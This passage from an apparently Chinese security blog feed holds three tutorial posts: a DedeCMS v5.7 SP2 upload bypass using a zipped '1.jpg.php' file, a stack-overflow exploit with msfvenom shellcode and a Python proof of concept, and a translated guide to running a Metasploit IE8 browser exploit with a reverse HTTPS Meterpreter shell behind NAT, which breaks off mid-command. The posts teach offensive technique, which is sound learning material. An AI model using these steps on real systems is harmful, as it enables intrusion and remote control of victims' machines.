continue;</span><br><span class="line"> }</span><br><span class="line"> else if(is_dir($truefile))</span><br><span class="line"> {</span><br><span class="line"> $this->GetMatchFiles($truefile, $fileexp, $filearr);</span><br><span class="line"> }</span><br><span class="line"> else if(preg_match("/\.(".$fileexp.")/i",$filename))</span><br><span class="line"> {</span><br><span class="line"> $filearr[] = $truefile;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> $dh->close();</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>问题就出在:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">else if(preg_match("/\.(".$fileexp.")/i",$filename))</span><br><span class="line">{</span><br><span class="line"> $filearr[] = $truefile;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>只要文件名中包含”.jpg”、”.png”、”.gif”即可被上传。因此可以在zip文件中创建包含这几个字符串的php文件然后上传。</p><h2 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h2><p>创建一个zip文件,其中包含一个php文件名称为”1.jpg.php”<br><img src="/2019/02/16/dedecms v5.7 sp2文件上传漏洞/1.png" alt=""><br>然后访问dede/album_edit.php,选择”从ZIP压缩包中解压文件”,然后上传准备好的zip文件。<br><img src="/2019/02/16/dedecms v5.7 sp2文件上传漏洞/2.png" alt=""><br>然后查看图集即可访问上传的php文件<br><img src="/2019/02/16/dedecms v5.7 sp2文件上传漏洞/3.png" alt=""></p>]]></content>
<summary type="html">
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>织梦内容管理系统(DedeCms) ,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,Dede
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="代码审计" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="文件上传" scheme="http://yoursite.com/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"/>
</entry>
<entry>
<title>metasploit在栈溢出中的运用</title>
<link href="http://yoursite.com/2019/02/13/metasploit%E5%9C%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%AD%E7%9A%84%E8%BF%90%E7%94%A8/"/>
<id>http://yoursite.com/2019/02/13/metasploit在栈溢出中的运用/</id>
<published>2019-02-13T12:21:03.000Z</published>
<updated>2019-02-13T12:36:14.761Z</updated>
<content type="html"><![CDATA[<h2 id="示例程序"><a href="#示例程序" class="headerlink" title="示例程序"></a>示例程序</h2><p>将下列存在栈溢出漏洞的代码在DEV-C++中编译<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#include <string.h></span><br><span class="line">#include <stdio.h></span><br><span class="line"></span><br><span class="line">void foo(char bar[]){</span><br><span class="line">char c[12];</span><br><span class="line">memcpy(c, bar, 1000);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line">FILE *fp;</span><br><span class="line">char a[1000];</span><br><span class="line">printf("input:"); </span><br><span class="line">fp = fopen("1.txt","rb");</span><br><span class="line">fread(a, 1, 1000,fp);</span><br><span class="line">fclose(fp);</span><br><span class="line">foo(a);</span><br><span class="line">return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><h2 id="控制EIP覆盖"><a href="#控制EIP覆盖" class="headerlink" title="控制EIP覆盖"></a>控制EIP覆盖</h2><p>使用metasploit中的pattern_create.rb生成字符串:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf > /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100</span><br><span class="line">[*] exec: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100</span><br><span class="line"></span><br><span class="line">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A</span><br></pre></td></tr></table></figure></p><p>将生成的字符串保存到1.txt中,然后OD中调试程序,可以看到当程序发生异常时EIP为41386141<br><img src="/2019/02/13/metasploit在栈溢出中的运用/1.png" alt=""><br><img src="/2019/02/13/metasploit在栈溢出中的运用/2.png" alt=""><br>然后在pattern_offset中确定EIP的位置;<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf > /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41386141 -l 100</span><br><span class="line">[*] exec: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41386141 -l 100</span><br><span class="line"></span><br><span class="line">[*] Exact match at offset 24</span><br></pre></td></tr></table></figure></p><p>可以确定EIP在第24个字符处</p><h2 id="编写poc"><a href="#编写poc" class="headerlink" title="编写poc"></a>编写poc</h2><p>在OD调试时可以知道EIP是在0062FAAC处,因此我们可以将shellcode放在其后继续覆盖,然后将EIP覆盖为0062FAB0,当程序在foo函数中执行retn时就会被劫持到shellcode处执行。</p><p>然后可以使用metasploit生成shellcode:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">[*] exec: msfvenom - -p windows/exec cmd=calc.exe -f python</span><br><span class="line"></span><br><span class="line">[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</span><br><span class="line">[-] No arch selected, selecting arch: x86 from the payload</span><br><span class="line">No encoder or badchars specified, outputting raw payload</span><br><span class="line">Payload size: 193 bytes</span><br><span class="line">Final size of python file: 932 bytes</span><br><span class="line">buf = ""</span><br><span class="line">buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"</span><br><span class="line">buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"</span><br><span class="line">buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"</span><br><span class="line">buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"</span><br><span class="line">buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"</span><br><span class="line">buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"</span><br><span class="line">buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"</span><br><span class="line">buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"</span><br><span class="line">buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"</span><br><span class="line">buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"</span><br><span class="line">buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"</span><br><span class="line">buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"</span><br><span class="line">buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"</span><br><span class="line">buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"</span><br><span class="line">buf += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"</span><br></pre></td></tr></table></figure></p><p>然后用python编写poc:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">shell = ""</span><br><span class="line">shell += "\xb0\xfa\x62\x00" \\覆盖EIP</span><br><span class="line">poc = ""</span><br><span class="line">poc += "\x41" * 24 + shell</span><br><span class="line">buf = ""</span><br><span class="line">buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"</span><br><span class="line">buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"</span><br><span class="line">buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"</span><br><span class="line">buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"</span><br><span class="line">buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"</span><br><span class="line">buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"</span><br><span class="line">buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"</span><br><span class="line">buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"</span><br><span class="line">buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"</span><br><span class="line">buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"</span><br><span class="line">buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"</span><br><span class="line">buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"</span><br><span class="line">buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"</span><br><span class="line">buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"</span><br><span class="line">buf += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"</span><br><span class="line"></span><br><span class="line">poc = poc + buf</span><br><span class="line">rst = open("1.txt",'w')</span><br><span class="line">rst.write(poc)</span><br><span class="line">rst.close();</span><br></pre></td></tr></table></figure></p><p>运行生成1.exe<br>最后运行示例程序,成功弹出计算器<br><img src="/2019/02/13/metasploit在栈溢出中的运用/3.png" alt=""></p>]]></content>
<summary type="html">
<h2 id="示例程序"><a href="#示例程序" class="headerlink" title="示例程序"></a>示例程序</h2><p>将下列存在栈溢出漏洞的代码在DEV-C++中编译<br><figure class="highlight plain"><t
</summary>
<category term="二进制安全" scheme="http://yoursite.com/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>翻译:Metasploit Meterpreter and NAT</title>
<link href="http://yoursite.com/2019/01/22/%E7%BF%BB%E8%AF%91-Metasploit-Meterpreter-and-NAT/"/>
<id>http://yoursite.com/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/</id>
<published>2019-01-22T05:39:58.000Z</published>
<updated>2019-01-22T06:05:26.034Z</updated>
<content type="html"><![CDATA[<h1 id="翻译:Metasploit-Meterpreter-and-NAT"><a href="#翻译:Metasploit-Meterpreter-and-NAT" class="headerlink" title="翻译:Metasploit Meterpreter and NAT"></a>翻译:Metasploit Meterpreter and NAT</h1><h2 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h2><p>在对某服务器进行实战渗透的过程中,我发现metasploit不能正常发起攻击,经过查阅后发现是因为Metasploit网络服务器无法监听我们路由器的公网IP,而这篇文章(原文链接:<a href="https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/" target="_blank" rel="noopener">https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/</a> )帮助我解决了这个问题,遂翻译,以下是正文。 </p><hr><p>专业测试人员通常使用直接连接到互联网的主机,具有公网IP地址,并且不受任何防火墙或NAT设备的阻碍以执行其监听。黑客攻击“naked”(暴露公网IP的主机)被认为是进行渗透测试的最简单方法,该测试涉及反弹shell。</p><p>不是所有人都可以将主机直接连接到互联网,随着免费公网IP地址的数量不断减少,在路由器或防火墙后面使用放置在局域网中的攻击机的需求将会增加。</p><p>将攻击机放在路由设备后面会将流量从私有转换为公共并且会产生一些问题。如果启动相当快速的端口扫描,您不仅需要确保NAT设备不会“中断”,而且由于主机位于专用网络中,即路由器或防火墙后面,因此无法直接从互联网</p><p>在这种情况下,执行攻击和处理返回信息的shell可能会有问题。</p><p>在这篇小文章中,我们将了解如何正确配置Meterpreter有效负载,并使攻击机位于NAT设备后面时正常工作。我们将使用浏览器漏洞来演示如何获得有效的Meterpreter会话,甚至靶机和攻击机都在NAT后面。</p><h2 id="网络配置"><a href="#网络配置" class="headerlink" title="网络配置"></a>网络配置</h2><p>我将在这篇文章中使用以下网络设置:<br><img src="/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/1.png" alt=""></p><p>攻击者和目标都在NAT设备后面。我们不知道目标使用的IP范围,我们已经确定从互联网到目标网络没有直接的路径,目标没有绑定的公网IP。<br>我们假设目标能够通过端口80和443连接到互联网。<br>在此文中,我使用IP 1.1.1.1来指攻击网络的“公共”方面。在尝试本文中的步骤时,您需要您自己的公网IP替换此IP。<br>我将使用Kali Linux作为攻击端,并在主机上设置了Metasploit Git存储库的克隆:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cd /</span><br><span class="line">mkdir -p /pentest/exploits</span><br><span class="line">git clone https://github.com/rapid7/metasploit.git</span><br><span class="line">cd metasploit-framework</span><br><span class="line">bundle install</span><br></pre></td></tr></table></figure></p><p>如果你已经设置了git clone,请确保使用“git pull”更新到最新版本.<br>靶机的系统为Windows XP SP3,但这并不重要,我们将使用浏览器漏洞来演示如何使用Meterpreter。我从IECollection安装了Internet Explorer 8(下载地址:<a href="http://utilu.com/IECollection/)" target="_blank" rel="noopener">http://utilu.com/IECollection/)</a>. 我将使用这个IE版本,因为它已经过时,并且存在大多数IE8浏览器漏洞。 </p><h2 id="在攻击端设置转发"><a href="#在攻击端设置转发" class="headerlink" title="在攻击端设置转发"></a>在攻击端设置转发</h2><p>如果我们希望能够接受来自目标的连接,我们需要配置攻击端防火墙/ NAT以在某些端口上转发流量。<br>执行此操作的确切步骤将非常特定于你正在使用的路由器/防火墙的品牌/型号/类型,所以这超出了这篇文章的范围。<br>一般来说,我们的想法是配置路由器/防火墙,在端口80和443上与路由器的公网IP地址进行通信,<br>并被转发到192.168.0.187(我的攻击机的内网IP)。<br>配置路由器/防火墙时,请务必检查路由器/防火墙是否开放端口80和443。 </p><p>我们将使用端口80为浏览器exp提供服务,通过端口443反向连接Meterpreter。首先,我们需要验证转发是否有效。 </p><p>在Kali上,创建一个小的html文件并将其存储在/ tmp下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root @ krypto1:/ #cd / tmp </span><br><span class="line">root @ krypto1:/ tmp #echo“it works”> test.html</span><br></pre></td></tr></table></figure></p><p>接下来,确保当前没有任何进程占用端口80或端口443<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# netstat -vantu | grep :80</span><br><span class="line">root@krypto1:/tmp# netstat -vantu | grep :443</span><br></pre></td></tr></table></figure></p><p>如果你没有看到两个命令的输出,可以进行下一步。如果列出了什么,你需要找到使用该端口的进程并终止进程。<br>对于端口80,你可以查看占用http端口的进程,使用lsof命令:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# lsof -i | grep :http </span><br><span class="line">apache2 4634 root 4u IPv6 393366 0t0 TCP *:http (LISTEN)</span><br><span class="line">apache2 4642 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)</span><br><span class="line">apache2 4643 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)</span><br><span class="line">apache2 4644 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)</span><br><span class="line">apache2 4645 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)</span><br><span class="line">apache2 4646 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)</span><br></pre></td></tr></table></figure></p><p>只需停止apache2即可释放端口:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# service apache2 stop</span><br><span class="line">Stopping web server: apache2 ... waiting .</span><br><span class="line">root@krypto1:/tmp#</span><br></pre></td></tr></table></figure></p><p>当端口可使用后,我们运行一个简单的web服务器并提供”test.html”页面。在包含test.html文件的文件夹中,运行以下python命令:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# python -m SimpleHTTPServer 80</span><br><span class="line">Serving HTTP on 0.0.0.0 port 80 ...</span><br></pre></td></tr></table></figure></p><p>如果你现在在Kali中访问<a href="http://192.168.0.187/test.html,您将看到“It" target="_blank" rel="noopener">http://192.168.0.187/test.html,您将看到“It</a> works”页面和<br><img src="/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/2.png" alt=""><br>Kali浏览器的输出应列出连接并显示该页面已响应。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# python -m SimpleHTTPServer 80</span><br><span class="line">Serving HTTP on 0.0.0.0 port 80 ...</span><br><span class="line">192.168.0.187 - - [04/Jan/2014 12:42:02] "GET /test.html HTTP/1.1" 200 -</span><br></pre></td></tr></table></figure></p><p>完美,这验证了网络服务器的工作原理。在靶机上,访问<a href="http://1.1.1.1/test.html" target="_blank" rel="noopener">http://1.1.1.1/test.html</a> (再一次,将1.1.1.1替换为攻击端路由器/防火墙的公网IP)并且你将得到同样的页面. 如果你没有看到该页面,请检查转发是否设置正确。<br>如果80端口成功,请返回攻击机并使用CTRL+C.终止python命令。然后再次启动命令,这次使用443端口:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# python -m SimpleHTTPServer 443</span><br><span class="line">Serving HTTP on 0.0.0.0 port 443 ...</span><br></pre></td></tr></table></figure></p><p>现在通过443端口访问Web服务器。尽管我们使用443端口并且443端口通常与https(加密)相关联,但我们的python处理程序不使用加密。也就是说,我们仍然必须在URL中使用http而不是https:<br><img src="/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/3.png" alt=""><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# python -m SimpleHTTPServer 443</span><br><span class="line">Serving HTTP on 0.0.0.0 port 443 ...</span><br><span class="line">192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /test.html HTTP/1.1" 200 -</span><br><span class="line">192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found</span><br><span class="line">192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 -</span><br><span class="line">192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found</span><br><span class="line">192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 -</span><br></pre></td></tr></table></figure></p><p>(不要担心与/favicon.ico相关的404消息 - 忽略它们是ok的)<br>如果您可以从靶机连接到<a href="http://1.1.1.1:443/test.html" target="_blank" rel="noopener">http://1.1.1.1:443/test.html</a> ,我们知道端口转发对端口80和443都正常工作。如果这不起作用,那就没有意义再继续,因为我们尝试的任何其他事情都将失败。</p><p>当一切正常时,关闭python命令以释放端口443。</p><h2 id="Metasploit配置"><a href="#Metasploit配置" class="headerlink" title="Metasploit配置"></a>Metasploit配置</h2><h4 id="浏览器漏洞利用-meterpreter-reverse-https"><a href="#浏览器漏洞利用-meterpreter-reverse-https" class="headerlink" title="浏览器漏洞利用 - meterpreter / reverse_https"></a>浏览器漏洞利用 - meterpreter / reverse_https</h4><p>首先,我们设置Metasploit以服务于浏览器漏洞并处理反向https Meterpreter连接。方法是欺骗目标连接80端口上的exp并通过端口443提供meterpreter/reverse_https连接。</p><p>转到metasploit-framework文件夹,打开msfconsole(如果你想确保从正确的文件夹运行msfconsole而不是Kali自带的版本,请不要忘记./)并选择一个漏洞。为了这个演示,我将使用ms13_069_caret.rb:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">root@krypto1:/tmp# cd /pentest/exploits/metasploit-framework/</span><br><span class="line">(master) root@krypto1:/pentest/exploits/metasploit-framework# ./msfconsole </span><br><span class="line"> , ,</span><br><span class="line"> / \</span><br><span class="line"> ((__---,,,---__))</span><br><span class="line"> (_) O O (_)_________</span><br><span class="line"> \ _ / |\</span><br><span class="line"> o_o \ M S F | \</span><br><span class="line"> \ _____ | *</span><br><span class="line"> ||| WW|||</span><br><span class="line"> ||| |||</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> =[ metasploit v4.9.0-dev [core:4.9 api:1.0]</span><br><span class="line">+ -- --=[ 1248 exploits - 678 auxiliary - 199 post</span><br><span class="line">+ -- --=[ 324 payloads - 32 encoders - 8 nops</span><br><span class="line"></span><br><span class="line">msf > use exploit/windows/browser/ms13_069_caret </span><br><span class="line">msf exploit(ms13_069_caret) ></span><br></pre></td></tr></table></figure></p><p>Show the options:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/windows/browser/ms13_069_caret):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0</span><br><span class="line"> SRVPORT 8080 yes The local port to listen on.</span><br><span class="line"> SSL false no Negotiate SSL for incoming connections</span><br><span class="line"> SSLCert no Path to a custom SSL certificate (default is randomly generated)</span><br><span class="line"> SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)</span><br><span class="line"> URIPATH no The URI to use for this exploit (default is random)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line"> Id Name</span><br><span class="line"> -- ----</span><br><span class="line"> 0 IE 8 on Windows XP SP3</span><br></pre></td></tr></table></figure></p><p>该漏洞需要一个SRVHOST和SRVPORT.这两个变量将由Metasploit用于确定网络服务器需要绑定和监听的位置。方法是使用我们的公网IP欺骗靶机连接到此网络服务器,然后流量转发到我们的Metasploit实例。</p><p>我们无法让Metasploit网络服务器监听我们路由器的公网IP,因为它无法将自己“绑定”到该IP地址。如果我们使用0.0.0.0,Metasploit网络服务器将只是监听传入流量的所有接口。换句话说,您可以将SRVHOST保留为0.0.0.0,或者您可以将其设置为Kali本身的l内网IP(本例中为192.168.0.187)。我将保留默认值为0.0.0.0.</p><p>接下来,我们需要将端口更改为80,并且我们将URIPATH设置为/ (因此我们可以知道URI将是什么,而不是让Metasploit创建随机URI):<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > set SRVPORT 80</span><br><span class="line">SRVPORT => 80</span><br><span class="line">msf exploit(ms13_069_caret) > set URIPATH /</span><br><span class="line">URIPATH => /</span><br></pre></td></tr></table></figure></p><p>接下来,我们选择meterpreter reverse_https作为payload。如果我们再次运行“show options”,我们会看到:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https</span><br><span class="line">payload => windows/meterpreter/reverse_https</span><br><span class="line">msf exploit(ms13_069_caret) > show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/windows/browser/ms13_069_caret):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0</span><br><span class="line"> SRVPORT 80 yes The local port to listen on.</span><br><span class="line"> SSL false no Negotiate SSL for incoming connections</span><br><span class="line"> SSLCert no Path to a custom SSL certificate (default is randomly generated)</span><br><span class="line"> SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)</span><br><span class="line"> URIPATH / no The URI to use for this exploit (default is random)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (windows/meterpreter/reverse_https):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> EXITFUNC process yes Exit technique: seh, thread, process, none</span><br><span class="line"> LHOST yes The local listener hostname</span><br><span class="line"> LPORT 443 yes The local listener port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line"> Id Name</span><br><span class="line"> -- ----</span><br><span class="line"> 0 IE 8 on Windows XP SP3</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msf exploit(ms13_069_caret) ></span><br></pre></td></tr></table></figure></p><p>模块选项(SRVHOST和SRVPORT)按我们希望的方式设置. payload选项需要LHOST和LPORT。根据上面的输出,LPORT已设置为443.这是反向Meterpreter将尝试连接的端口。如果你的kali上没有设置为443,只需运行“set LPORT 443”使Meterpreter处理程序侦听端口443:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(ms13_069_caret) > set LPORT 443</span><br><span class="line">LPORT => 